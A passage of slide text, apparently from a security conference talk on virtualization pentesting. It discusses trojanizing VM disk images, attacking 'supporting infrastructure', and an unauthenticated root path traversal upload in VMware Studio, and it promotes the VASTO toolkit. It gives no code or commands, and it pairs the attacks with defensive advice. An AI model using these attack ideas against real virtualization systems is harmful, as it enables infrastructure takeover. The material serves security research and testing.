  • 38. What does it all mean? Try to segregate the network, or use a VPN Monitor traffic for anomalies Can I suggest Masibty? No internet exposition
  • 39. Once you're in The Renegade will want to become Sheriff Aiming at “long time control” of the city We all know what it means...
  • 40. Trojanizing VMs Even with direct access to the machines, it's non-trivial Custom disk formats – VMDK, VHD Hard to access without breaking the disk layout We do have proprietary libraries we can use Bottom line: even one access to the VM library means losing the infrastructure!
  • 41. Shoot the pianist Yet another meme: shoot the “supporting infrastructure” Attacking is often easy Risk is not well- understood Low protection Lots of supporting services Converters Backup managers Profilers…
  • 42. VMware Studio A virtual appliance used to build appliances Used by developers to manage appliances... ...which are likely deployed on the infrastructure
  • 43. File Upload Yet another path traversal in the web interface As root Without any authentication Breaking the Studio appliance might mean getting all the built appliances SN-2009-03
  • 44. Bottom Line Take care of the infrastructure as well! Don't really trust third party products unless tested... Try to implement proper segregation
  • 45. Conclusions When a man with a .45 meets a man with a rifle, the man with a pistol will be a dead man. We're developing new tools to improve our arsenal Virtualization security is not (yet) well understood If you don't test and prove it, it doesn't exist!
  • 46. Future of VASTO … more modules to come … will try to be the reference in virtualization pentest … beta testers needed
  • 48. Thank you! Grab the beta at nibblesec.org Claudio Criscione c.criscione@securenetwork.it